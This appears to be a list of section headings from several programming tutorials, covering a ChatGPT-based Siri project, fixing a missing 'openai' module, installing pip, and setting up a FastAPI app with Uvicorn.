
Step 7

Step 8

Step 9

Step 10

Step 11

Step 12

Step 13

Putting It All Together

How to Run This Code?

What Is an Embedding in This Context?

Project Idea: Recreate Siri Using ChatGPT

Prompt First Trial – Not Perfect Yet

Final Prompt

Refinement Prompt

My Personal Considerations and Findings Using This Prompt

How to Deploy This

Skills Stacking – Basic Idea

How to Stack Skills?

A Few Words on Persistence

Conclusion

Bonus – Exponential Skill Stacking

Problem Formulation

Solution Idea 1: Install Library OpenAI

Solution Idea 2: Fix the Path

Other Solution Ideas

Understanding the “import” Statement

What’s the Difference Between ImportError and ModuleNotFoundError?

Related Videos

How to Fix “ModuleNotFoundError: No module named ‘openai’” in PyCharm

What Is Pip?

Is Pip Already Included in Python?

5 Steps to Install Pip Easily

How to Download get-pip.py from Official Python?

Are There Other Ways to Install Pip?

How to Upgrade Pip?

I learn as I go…

Flask vs FastAPI

Uvicorn Server

Creating Basic FastAPI App

Receiving “Hello World” from Server

Endpoint Layout